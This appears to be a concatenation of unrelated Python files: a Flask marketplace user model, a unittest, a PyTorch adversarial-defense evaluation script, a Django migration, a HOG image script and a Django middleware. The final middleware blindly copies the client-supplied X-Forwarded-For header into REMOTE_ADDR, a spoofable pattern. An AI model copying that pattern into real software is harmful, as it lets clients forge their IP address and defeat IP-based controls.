db.session.add(self)
return True
def reset_password(self, token, new_password):
"""Verify the new password for this user."""
s = Serializer(current_app.config['SECRET_KEY'])
try:
data = s.loads(token)
except (BadSignature, SignatureExpired):
return False
if data.get('reset') != self.id:
return False
self.password = new_password
db.session.add(self)
return True
@staticmethod
def generate_fake(count=100, **kwargs):
"""Generate a number of fake users for testing."""
from sqlalchemy.exc import IntegrityError
from random import seed, choice
from faker import Faker
fake = Faker()
roles = Role.query.all()
seed()
for i in range(count):
role = choice(roles)
if role.index == 'merchant':
u = Merchant(
first_name=fake.first_name(),
last_name=fake.last_name(),
email=fake.email(),
password=fake.password(),
confirmed=True,
role=choice(roles),
**kwargs
)
elif role.index == 'vendor':
u = Vendor(
first_name=fake.first_name(),
last_name=fake.last_name(),
email=fake.email(),
password=fake.password(),
confirmed=True,
role=choice(roles),
**kwargs
)
else:
u = User(
first_name=fake.first_name(),
last_name=fake.last_name(),
email=fake.email(),
password=fake.password(),
confirmed=True,
role=choice(roles),
**kwargs
)
db.session.add(u)
try:
db.session.commit()
except IntegrityError:
db.session.rollback()
@staticmethod
def user_search(**kwargs):
""" Returns all users matching criteria"""
filter_list = []
if 'main_search_term' in kwargs:
term = kwargs['main_search_term']
if " " in (term.strip()):
array_term = term.split(' ', 1) # split into first and last name
filter_list.append(or_(User.first_name.like('%{}%'.format(array_term[0])),
User.last_name.like('%{}%'.format(array_term[1]))))
else:
filter_list.append(or_(User.first_name.like('%{}%'.format(term)),
User.last_name.like('%{}%'.format(term))))
if 'company_search_term' in kwargs and kwargs['company_search_term']:
term = kwargs['company_search_term']
vendors = Vendor.query.filter(Vendor.company_name.like('%{}%'.format(term))).all()
vendor_ids = [vendor.id for vendor in vendors]
if len(vendor_ids) > 0:
filter_list.append(User.id.in_(vendor_ids))
if 'company_search_term' in kwargs and kwargs['company_search_term']:
term = kwargs['company_search_term']
merchants = Merchant.query.filter(Merchant.company_name.like('%{}%'.format(term))).all()
merchant_ids = [merchant.id for merchant in merchants]
if len(merchant_ids) > 0:
filter_list.append(User.id.in_(merchant_ids))
if 'user_type' in kwargs:
user_criteria = kwargs['user_type']
format(user_criteria)
if user_criteria == "merchant":
filter_list.append(User.user_type == "merchant")
elif user_criteria == "vendor":
filter_list.append(User.user_type == "vendor")
elif user_criteria == "merchant_vendor":
filter_list.append(or_(User.user_type == "merchant",
User.user_type == "vendor"))
elif user_criteria == "admin":
filter_list.append(User.role_id == 2)
else:
()
filtered_query = User.query.filter(*filter_list)
if 'sort_by' in kwargs and kwargs['sort_by']:
sort = kwargs['sort_by']
format(sort)
else:
sort = None
if sort == "alphaAZ":
sorted_query = filtered_query.order_by(func.lower(User.last_name))
elif sort == "alphaZA":
sorted_query = filtered_query.order_by(desc(func.lower(User.last_name)))
else: # default sort
sorted_query = filtered_query.order_by(func.lower(User.last_name))
return sorted_query
def __repr__(self):
return '<User \'%s\'>' % self.full_name()
class AnonymousUser(AnonymousUserMixin):
def can(self, _):
return False
def is_admin(self):
return False
def is_vendor(self):
return False
def is_merchant(self):
return False
def is_merchant_or_vendor(self):
return False
class Vendor(User):
__mapper_args__ = {'polymorphic_identity': 'vendor'}
id = db.Column(db.Integer, db.ForeignKey('users.id'), primary_key=True)
# are the vendor's prices visible to other vendors?
visible = db.Column(db.Boolean, default=False)
listings = db.relationship("Listing", backref="vendor", lazy="dynamic", cascade='all, delete-orphan')
company_name = db.Column(db.String(64), default="")
# public profile information
bio = db.Column(db.String(1000), default="")
address = db.Column(db.String(64), default="")
phone_number = db.Column(db.String(64), default="")
website = db.Column(db.String(64), default="")
public_email = db.Column(db.String(64), default="")
image = db.Column(db.String(64), default="")
pdf = db.Column(db.String(64), default="")
f1 = db.Column(db.String(1000), default="")
tags = db.relationship("TagAssociation", back_populates="vendor", cascade='all, delete-orphan')
orders = db.relationship("Order", backref="vendor", cascade='all, delete-orphan')
product_id_col = db.Column(db.String(64), default="ProductID")
ratings_vendor = db.relationship("Ratings", backref="vendor", cascade='all, delete-orphan')
listing_description_col = db.Column(db.String(64), default="Description")
price_col = db.Column(db.String(64), default="Price")
name_col = db.Column(db.String(64), default="Name")
unit_col = db.Column(db.String(64), default="Unit")
quantity_col = db.Column(db.String(64), default="Quantity")
def get_tags(self):
return [str(tag.tag.tag_name) for tag in self.tags]
def __init__(self, **kwargs):
super(Vendor, self).__init__(**kwargs)
self.visible = kwargs.get('visible', False)
self.role = Role.query.filter_by(index='vendor').first()
def __repr__(self):
return '<Vendor %s>' % self.full_name()
def get_rating_value(self):
ratings = Ratings.query.filter_by(vendor_id=self.id).all()
if not ratings:
return -1.0
total_rating = 0.0
for rating in ratings:
total_rating += rating.star_rating
return '%.1f' % (total_rating / len(ratings))
def get_all_ratings(self):
ratings = Ratings.query.filter_by(vendor_id=self.id).all()
ratings.sort(key=lambda r: r.date_reviewed, reverse=True)
return ratings
def get_ratings_query(self):
ratings = Ratings.query.filter_by(vendor_id=self.id)
sorted_ratings = ratings.order_by(desc(Ratings.date_reviewed))
return sorted_ratings
def get_ratings_breakdown(self):
ratings = Ratings.query.filter_by(vendor_id=self.id)
ratings_breakdown = {"1.0": 0, "2.0": 0, "3.0": 0, "4.0": 0, "5.0": 0}
for rating in ratings:
ratings_breakdown[rating.star_rating] = ratings_breakdown.get(rating.star_rating, 0) + 1
return ratings_breakdown
@staticmethod
def get_vendor_by_user_id(user_id):
return Vendor.query.filter_by(id=user_id).first()
class Merchant(User):
__mapper_args__ = {'polymorphic_identity': 'merchant'}
id = db.Column(db.Integer, db.ForeignKey('users.id'), primary_key=True)
cart_items = db.relationship("CartItem", backref="users", lazy="dynamic", cascade='all, delete-orphan')
orders = db.relationship("Order", backref="merchant", lazy="dynamic", cascade='all, delete-orphan')
company_name = db.Column(db.String(64), default="")
def get_cart_listings(self):
return [cart_item.listing for cart_item in self.cart_items]
def get_cart_item(self, listing_id):
""" Returns a cart_item based on its listing_id """
for cart_item in self.cart_items:
if cart_item.listing.id == listing_id:
return cart_item
return None
def __init__(self, **kwargs):
super(Merchant, self).__init__(**kwargs)
self.role = Role.query.filter_by(index='merchant').first()
def __repr__(self):
return '<Merchant %s>' % self.full_name()
login_manager.anonymous_user = AnonymousUser
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
|
"""
Created on Fri Jan 07 20:53:58 2022
@author: Ankit Bharti
"""
from unittest import TestCase, main
from cuboid_volume import *
class TestCuboid(TestCase):
def test_volume(self):
self.assertAlmostEqual(cuboid_volume(2), 8)
self.assertAlmostEqual(cuboid_volume(1), 1)
self.assertAlmostEqual(cuboid_volume(0), 0)
def test_input_value(self):
self.assertRaises(TypeError, cuboid_volume, 'ank')
def test_addition(self):
self.assertEqual(add(3, 4), 7)
self.assertAlmostEqual(add(4.5, 6.2), 10.701, places=2)
def test_addition_input_value(self):
self.assertRaises(TypeError, add, 'ank', 6)
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# **************************************
# @Time : 2018/11/13 10:16
# @Author : Xiang Ling
# @Lab : nesa.zju.edu.cn
# @File : RT_Test.py
# **************************************
import argparse
import os
import random
import sys
import numpy as np
import torch
sys.path.append('%s/../' % os.path.dirname(os.path.realpath(__file__)))
from RawModels.MNISTConv import MNISTConvNet
from RawModels.ResNet import resnet20_cifar
from RawModels.Utils.dataset import get_mnist_test_loader, get_cifar10_test_loader
from Defenses.DefenseMethods.RT import RTDefense
def main(args):
# Device configuration
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu_index
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
# Set the random seed manually for reproducibility.
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
torch.manual_seed(args.seed)
if torch.cuda.is_available():
torch.cuda.manual_seed(args.seed)
np.random.seed(args.seed)
random.seed(args.seed)
batch_size = 200
model_location = '{}/{}/model/{}_raw.pt'.format('../RawModels', args.dataset, args.dataset)
# Get training parameters, set up model frameworks and then get the train_loader and test_loader
dataset = args.dataset.upper()
assert dataset == 'MNIST' or dataset == 'CIFAR10'
if dataset == 'MNIST':
raw_model = MNISTConvNet().to(device)
test_loader = get_mnist_test_loader(dir_name='../RawModels/MNIST/', batch_size=batch_size)
else:
raw_model = resnet20_cifar().to(device)
test_loader = get_cifar10_test_loader(dir_name='../RawModels/CIFAR10/', batch_size=batch_size)
raw_model.load(path=model_location, device=device)
defense_name = 'RT'
rt = RTDefense(model=raw_model, defense_name=defense_name, dataset=dataset, device=device)
# predicting the testing dataset using the randomization transformation defense
raw_model.eval()
total = 0.0
correct = 0.0
with torch.no_grad():
for index, (images, labels) in enumerate(test_loader):
# input images first go through the randomization transformation layer and then the resulting images are feed into the original model
transformed_images = rt.randomization_transformation(samples=images, original_size=images.shape[-1], final_size=args.resize)
outputs = raw_model(transformed_images)
labels = labels.to(device)
_, predicted = torch.max(outputs.data, 1)
total = total + labels.size(0)
correct = correct + (predicted == labels).sum().item()
ratio = correct / total
print('\nTest accuracy of the {} model on the testing dataset: {:.1f}/{:.1f} = {:.2f}%\n'.format(raw_model.model_name, correct, total,
ratio * 100))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='The RT Defenses')
parser.add_argument('--dataset', type=str, default='CIFAR10', help='the dataset (MNIST or CIFAR10)')
parser.add_argument('--seed', type=int, default=100, help='the default random seed for numpy and torch')
parser.add_argument('--gpu_index', type=str, default='0', help="gpu index to use")
# parameters for the RT Defense
parser.add_argument('--resize', type=int, default=36, help='the final size for the randomization transformation')
arguments = parser.parse_args()
main(arguments)
|
# Generated by Django 3.0.4 on 2020-03-29 12:26
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='IletisimModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('adi', models.CharField(max_length=100)),
('soyadi', models.CharField(max_length=100)),
('email', models.EmailField(max_length=254)),
('yazi', models.TextField()),
('zaman', models.DateTimeField(default=django.utils.timezone.now)),
('degerlendirme', models.CharField(choices=[('5', 'Çok İyi'), ('4', 'İyi'), ('3', 'Kararsızım'), ('2', 'Kötü'), ('1', 'Çok Kötü')], max_length=10)),
],
),
]
|
"""
Histogram of Oriented Gradients
Based on:
https://scikit-image.org/docs/dev/auto_examples/features_detection/plot_hog.html
"""
import matplotlib.pyplot as plt
from skimage import exposure, io
from skimage.feature import hog
image1 = io.imread("image.png")
fd, hog_image = hog(image1,
orientations=8,
pixels_per_cell=(16, 16),
cells_per_block=(1, 1),
visualize=True,
multichannel=True)
# Rescale histogram for better display
hog_image_rescaled = exposure.rescale_intensity(hog_image, in_range=(0, 10))
plt.rcParams['figure.figsize'] = [10, 10]
f, axarr = plt.subplots(1, 2, figsize=(6, 6), sharex=True)
f.subplots_adjust(hspace=0.1, wspace=0.01)
axarr[0].axis('off')
axarr[0].imshow(image1, cmap='gray')
axarr[0].set_title('Input image')
axarr[1].axis('off')
axarr[1].imshow(hog_image_rescaled, cmap='gray')
axarr[1].set_title('HOG')
plt.imsave('hog_target.jpg', hog_image_rescaled, cmap='gray')
|
class RemoteAddrMiddleware(object):
def __init__(self, get_response):
self.get_response = get_response
def __call__(self, request):
self.process_request(request)
response = self.get_response(request)
# Code to be executed for each request/response after
# the view is called.
return response
def process_request(self, request):
if 'HTTP_X_FORWARDED_FOR' in request.META:
ip = request.META['HTTP_X_FORWARDED_FOR'].split(',')[0].strip()
request.META['REMOTE_ADDR'] = ip
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.